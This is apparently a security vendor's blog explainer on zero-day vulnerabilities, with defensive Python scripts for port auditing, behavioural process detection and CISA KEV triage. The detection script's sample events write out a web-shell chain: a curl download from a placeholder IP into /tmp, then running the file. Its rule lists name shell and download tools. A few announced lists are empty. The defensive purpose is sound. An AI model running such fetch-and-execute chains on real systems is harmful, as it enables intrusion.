What Is a Zero-Day Vulnerability?

By Kalenfy · Updated 27 June 2026 · 6 min read

A zero-day vulnerability is a security flaw that attackers know about and can exploit before the vendor knows it exists, or at least before a fix is available. The "zero" is the number of days the vendor has had to fix it: zero. In practice that means there is no update to apply, no vendor-supplied mitigation, and usually no detection signature yet, because nobody on the defending side has seen the exploit.

Zero-days are among the most dangerous threats in security, and among the most misunderstood. The term is often used loosely to mean any unpatched flaw, but the precise meaning is a vulnerability that is unknown to the vendor (and therefore unpatched) at the time it is exploited.

How zero-days are discovered and exploited

Vulnerabilities are found by many parties:

When an attacker finds (or buys) a zero-day, they have a window, potentially weeks or months, to use it against any vulnerable target before the vendor learns of it and ships a patch. High-value zero-days in widely used software (operating systems, VPN appliances, mail servers such as Microsoft Exchange, browsers) can sell for millions of dollars on exploit markets.

The lifecycle of a zero-day

  1. Discovery: an attacker finds the flaw; the vendor does not know it exists
  2. Weaponisation: the attacker builds a reliable exploit
  3. Active exploitation: targets are attacked, either selectively (one organisation) or at scale (scanning the internet for vulnerable instances)
  4. Discovery by defenders: incident responders, threat intelligence teams or the vendor notice the exploitation
  5. Disclosure and patch: the vendor is notified (or finds the flaw independently), develops a fix, and a CVE identifier is assigned
  6. Patch window: organisations race to apply the fix before attackers who reverse-engineer the patch, or reuse the original exploit, turn it against everyone who has not yet updated

Once a patch is released, the vulnerability is no longer a zero-day. It becomes an N-day vulnerability (N being the number of days since the fix shipped), exploited by attackers who know that most organisations will not patch quickly.

Are zero-days a realistic threat for small businesses?

Directly targeted zero-day attacks — a nation-state using a custom exploit against your specific organisation — are rare for small businesses. But zero-days matter to you in two indirect ways:

How to reduce your zero-day exposure

You cannot patch a zero-day before the vendor ships a fix. What you can do is make exploitation harder and limit the blast radius when it succeeds:

Patch everything else fast

Most successful attacks use known vulnerabilities for which a patch already exists, not zero-days. Organisations that patch quickly close the window between disclosure and exploitation. Critical patches, especially for internet-facing systems, should be applied within hours or days, not weeks. Zero-days are the threat you cannot patch; leaving everything else unpatched is negligence.

Reduce your attack surface

Zero-days need something to exploit, and an attacker cannot exploit a service that is not running or not reachable. Disable services you do not use, keep admin panels off the public internet, restrict RDP and SSH to a VPN or known IP addresses, and remove software you do not actively need. Every listening service is attack surface.
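Knowing what is actually listening is the first step of reducing attack surface. The following script is an added example, not Kalenfy's code: it parses the output of the Linux `ss -H -tlnp` command and reports services bound to every interface on ports that should never face the internet. The port list is an assumption for the example, and the sample output embedded below is constructed, not captured from a real host; run it with no arguments to audit the live machine.

```python
"""Audit listening TCP sockets for services exposed on all interfaces.

Added example, not Kalenfy's code. Parses `ss -H -tlnp` (Linux iproute2)
output: columns are State, Recv-Q, Send-Q, Local Address:Port,
Peer Address:Port, Process. Run with --sample to use the constructed data.
"""
import subprocess
import sys

# Ports that should normally never be reachable from the public internet.
# The list is an assumption for the example; extend it for your estate.
ADMIN_PORTS = {
    22: "SSH", 23: "Telnet", 3389: "RDP", 5900: "VNC",
    3306: "MySQL", 5432: "PostgreSQL", 6379: "Redis", 27017: "MongoDB",
    9200: "Elasticsearch", 2375: "Docker API", 8080: "HTTP admin/alt",
}

# Local addresses that mean "every interface" in ss output (IPv4 and IPv6).
WILDCARDS = {"0.0.0.0", "*", "[::]", "::"}

# Constructed sample of `ss -H -tlnp` output, not from a real host.
SAMPLE = """\
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*    users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:443       0.0.0.0:*    users:(("nginx",pid=1201,fd=6))
LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*    users:(("mysqld",pid=934,fd=20))
LISTEN 0      511             [::]:8080         [::]:*    users:(("java",pid=1450,fd=45))
LISTEN 0      128             [::]:22           [::]:*    users:(("sshd",pid=812,fd=4))
LISTEN 0      128        127.0.0.1:6379      0.0.0.0:*    users:(("redis-server",pid=700,fd=6))
"""


def parse_ss(text):
    """Yield (address, port, process) for each LISTEN line of ss -H -tlnp."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # skips a header line if -H was omitted
        # rpartition handles "[::]:8080" and "*:22" as well as "0.0.0.0:22"
        addr, _, port = fields[3].rpartition(":")
        process = " ".join(fields[5:]) if len(fields) > 5 else "-"
        yield addr, int(port), process


def find_exposed(text):
    """Return (port, service_name, process) for wildcard-bound admin ports.

    Deduplicated by port so a daemon listening on both IPv4 and IPv6
    (sshd above) is reported once.
    """
    findings = {}
    for addr, port, process in parse_ss(text):
        if addr in WILDCARDS and port in ADMIN_PORTS and port not in findings:
            findings[port] = (port, ADMIN_PORTS[port], process)
    return [findings[p] for p in sorted(findings)]


def main():
    if "--sample" in sys.argv:
        text = SAMPLE
    else:
        try:
            text = subprocess.run(["ss", "-H", "-tlnp"], capture_output=True,
                                  text=True, check=True).stdout
        except FileNotFoundError:
            sys.exit("ss not found; run with --sample to see the constructed data")
    exposed = find_exposed(text)
    for port, name, process in exposed:
        print(f"EXPOSED {name:<14} tcp/{port:<5} {process}")
    print(f"{len(exposed)} admin service(s) bound to all interfaces")


if __name__ == "__main__":
    main()
```

On the sample data only SSH and the Java service on 8080 are reported: MySQL and Redis are bound to loopback, and 443 is the service you actually mean to expose. Anything the script flags should either be firewalled to a VPN or known source addresses, re-bound to a private interface, or switched off.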

Use a WAF and virtual patching

A WAF can detect and block known attack patterns, including attempts to exploit a vulnerability for which the software vendor has not yet shipped a patch. Some WAF providers (Cloudflare, AWS) push virtual-patch rules within hours of a zero-day disclosure, giving you protection before the official fix arrives. This only helps once the vulnerability is known to the WAF vendor, and a rule written against one exploit payload can often be bypassed by a variation of it, so treat virtual patching as a stopgap that buys time to apply the real patch, not as a substitute for it.

Principle of least privilege

If an attacker exploits a zero-day in your web server, how much can they do with it? If the process runs as root with access to your entire filesystem, the answer is "everything." If it runs as a limited user with access only to what it needs, the blast radius shrinks dramatically. Apply this everywhere: services, user accounts, API keys, database permissions.

Endpoint detection and response (EDR)

EDR tools look for exploitation behaviour (shellcode execution, a web server or document reader spawning a shell, memory injection, unusual process chains) rather than for known malware signatures, so they can catch zero-day exploitation attempts that traditional antivirus misses entirely. They are not a guarantee: well-resourced attackers test their tooling against common EDR products, and an alert only helps if someone acts on it.
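The behavioural rules EDR products apply are simpler than the products themselves suggest. The script below is an added example, not any vendor's detection engine: it runs a handful of parent/child lineage rules (a server process spawning a shell, an Office application spawning a shell, a download into or execution from a scratch directory) over process-creation events. The event format and the process name lists are assumptions for the example, and the events are constructed samples, not real telemetry.

```python
"""Behavioural detection of post-exploitation process activity.

Added example, not a vendor's EDR logic. Applies parent/child lineage
rules to process-creation events of a simple constructed schema:
ts, host, user, parent_image, image, cmdline.
"""
import json

# Server-side processes that should never spawn a shell or a download tool.
# A shell child here usually means a web shell or an exploited RCE bug.
# Names are matched exactly after lower-casing; a real rule set would also
# normalise versioned names such as php-fpm8.2. Lists are assumptions.
SERVER_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "w3wp.exe", "tomcat", "java"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe"}
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def basename(path):
    """Lower-cased file name from a Unix or Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules the event matches (empty if benign)."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    hits = []
    if parent in SERVER_PARENTS and child in SHELLS:
        hits.append("server_spawned_shell")
    if parent in SERVER_PARENTS and child in DOWNLOADERS:
        hits.append("server_spawned_downloader")
    if parent in OFFICE_PARENTS and child in SHELLS | DOWNLOADERS:
        hits.append("office_spawned_shell")
    if child in DOWNLOADERS and any(d in event["cmdline"] for d in SCRATCH_DIRS):
        hits.append("download_to_scratch_dir")
    if event["image"].startswith(SCRATCH_DIRS):
        hits.append("exec_from_scratch_dir")
    return hits


def detect(events):
    """Run every event through evaluate(); return alerts with the rule names."""
    alerts = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                           "rules": hits,
                           "chain": f'{basename(ev["parent_image"])} -> {ev["cmdline"]}'})
    return alerts


# Constructed sample events (JSON lines), not captured from a real host.
# Lines 2-4 are the classic web-shell chain; line 5 is a macro dropper.
SAMPLE_EVENTS = [json.loads(line) for line in """\
{"ts":"2026-06-27T09:14:02Z","host":"web-01","user":"www-data","parent_image":"/usr/sbin/nginx","image":"/usr/sbin/nginx","cmdline":"nginx: worker process"}
{"ts":"2026-06-27T09:14:05Z","host":"web-01","user":"www-data","parent_image":"/usr/sbin/php-fpm","image":"/bin/sh","cmdline":"sh -c id"}
{"ts":"2026-06-27T09:14:06Z","host":"web-01","user":"www-data","parent_image":"/bin/sh","image":"/usr/bin/curl","cmdline":"curl -s http://198.51.100.7/x -o /tmp/x"}
{"ts":"2026-06-27T09:14:07Z","host":"web-01","user":"www-data","parent_image":"/bin/sh","image":"/tmp/x","cmdline":"/tmp/x"}
{"ts":"2026-06-27T09:20:11Z","host":"pc-17","user":"alice","parent_image":"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE","image":"C:\\\\Windows\\\\System32\\\\cmd.exe","cmdline":"cmd.exe /c whoami"}
{"ts":"2026-06-27T09:21:00Z","host":"pc-17","user":"alice","parent_image":"C:\\\\Windows\\\\explorer.exe","image":"C:\\\\Windows\\\\System32\\\\notepad.exe","cmdline":"notepad.exe notes.txt"}
""".splitlines()]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

None of these rules knows which vulnerability was exploited, which is the point: the shell spawned by php-fpm looks the same whether it came from a zero-day or a ten-year-old bug. Real EDR adds the whole process ancestry, in-memory scanning and user context; each rule here looks one hop up the tree, so the curl on line 3 is caught by its destination path rather than by its grandparent.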

Threat intelligence and monitoring

Subscribe to the security advisories of every major vendor whose software you run. Follow CISA's Known Exploited Vulnerabilities (KEV) catalogue, which lists vulnerabilities confirmed to be exploited in the wild, including newly disclosed ones, each with a date by which US federal agencies must remediate it. Speed of awareness is speed of response.
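The KEV catalogue is published as JSON, so the "patch fast" and "know what is being exploited" advice above can be turned into a daily check. The script below is an added example, not Kalenfy's or CISA's code: it matches catalogue entries against a list of vendor/product pairs you run, works out how long each has been known-exploited, and orders them by urgency. The catalogue entries embedded here are constructed placeholders in the real feed's field layout (CVE-0000-000x, fictional vendors), not real records, so it runs offline; `fetch_kev()` pulls the live feed.

```python
"""Match the CISA KEV catalogue against a software inventory.

Added example, not Kalenfy's or CISA's code. The live feed lives at KEV_URL
and its entries use the field names below (cveID, vendorProject, product,
dateAdded, dueDate, knownRansomwareCampaignUse, requiredAction). The sample
entries are constructed placeholders, not real vulnerabilities.
"""
import json
import urllib.request
from datetime import date

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed sample in the KEV JSON layout. Nothing here is a real vulnerability.
SAMPLE_KEV = json.loads("""
{"title": "CISA Catalog of Known Exploited Vulnerabilities", "count": 3,
 "vulnerabilities": [
  {"cveID": "CVE-0000-0001", "vendorProject": "ExampleCorp", "product": "ExampleVPN Gateway",
   "vulnerabilityName": "ExampleVPN Gateway Authentication Bypass",
   "dateAdded": "2026-06-20", "dueDate": "2026-07-11",
   "knownRansomwareCampaignUse": "Known",
   "requiredAction": "Apply mitigations per vendor instructions or discontinue use."},
  {"cveID": "CVE-0000-0002", "vendorProject": "ExampleSoft", "product": "MailServer",
   "vulnerabilityName": "MailServer Remote Code Execution",
   "dateAdded": "2026-05-01", "dueDate": "2026-05-22",
   "knownRansomwareCampaignUse": "Unknown",
   "requiredAction": "Apply updates per vendor instructions."},
  {"cveID": "CVE-0000-0003", "vendorProject": "OtherVendor", "product": "Unrelated Widget",
   "vulnerabilityName": "Unrelated Widget Privilege Escalation",
   "dateAdded": "2026-06-25", "dueDate": "2026-07-16",
   "knownRansomwareCampaignUse": "Unknown",
   "requiredAction": "Apply updates per vendor instructions."}
 ]}
""")

# Constructed inventory: (vendor, product) pairs for software you actually run.
INVENTORY = [("ExampleCorp", "ExampleVPN"), ("ExampleSoft", "MailServer")]


def fetch_kev(url=KEV_URL, timeout=20):
    """Download and parse the live catalogue (network access required)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


def _norm(s):
    return " ".join(s.lower().split())


def triage(kev, inventory, today):
    """Return KEV entries affecting the inventory, most urgent first.

    Matching is case-insensitive: the vendor must match exactly and the
    inventory product name must appear inside the catalogue product name,
    because KEV names product families rather than exact versions.
    """
    wanted = [(_norm(v), _norm(p)) for v, p in inventory]
    hits = []
    for entry in kev["vulnerabilities"]:
        vendor, product = _norm(entry["vendorProject"]), _norm(entry["product"])
        if not any(vendor == v and p in product for v, p in wanted):
            continue
        due = date.fromisoformat(entry["dueDate"])
        hits.append({
            "cve": entry["cveID"],
            "product": f'{entry["vendorProject"]} {entry["product"]}',
            "days_known_exploited": (today - date.fromisoformat(entry["dateAdded"])).days,
            "due": due,
            "overdue": due < today,
            "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            "action": entry["requiredAction"],
        })
    # Overdue first, then ransomware-linked, then nearest due date.
    hits.sort(key=lambda h: (not h["overdue"], not h["ransomware"], h["due"]))
    return hits


def sample_triage():
    """Run the triage over the constructed data with a fixed 'today'."""
    return triage(SAMPLE_KEV, INVENTORY, date(2026, 6, 27))


if __name__ == "__main__":
    for h in sample_triage():
        flag = "OVERDUE " if h["overdue"] else ""
        print(f'{flag}{h["cve"]} {h["product"]}: exploited for {h["days_known_exploited"]}d, '
              f'due {h["due"]}, ransomware={h["ransomware"]}: {h["action"]}')
```

Replace `SAMPLE_KEV` with `fetch_kev()` and `INVENTORY` with your real software list and this becomes a scheduled job. The due dates are CISA's deadlines for federal agencies, but they are a reasonable yardstick for anyone: an entry that is overdue has been known-exploited for weeks, and anything still running it is an N-day target.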

FAQ

Is a zero-day the same as a CVE?

No. A CVE (Common Vulnerabilities and Exposures) entry is a public identifier assigned to a known vulnerability, usually around the time it is disclosed. A zero-day is exploited before a CVE exists, or disclosure and exploitation happen at the same time. Once it has a CVE and a patch it is technically no longer a zero-day, though it may still be heavily exploited as an N-day.

How long does a zero-day stay "zero-day"?

Until the vendor releases a patch. That can be hours (if the vendor is already aware or responds quickly) or months, sometimes years (for complex vulnerabilities, or when attackers keep their exploits quiet so they stay useful).

Should small businesses worry about zero-days?

Focus on the basics first: patching known vulnerabilities, enabling 2FA, configuring email authentication, reducing attack surface. Zero-days are a threat, but unpatched known vulnerabilities are responsible for the vast majority of real-world breaches. Fix the known problems and you're ahead of most targets.

Check your own domain — free

Kalenfy runs a passive scan of your SPF, DKIM, DMARC, DNSSEC, CAA and more, then gives you a downloadable PDF report with exact fixes. You see your grade first — no email needed to view it.

Scan my site free
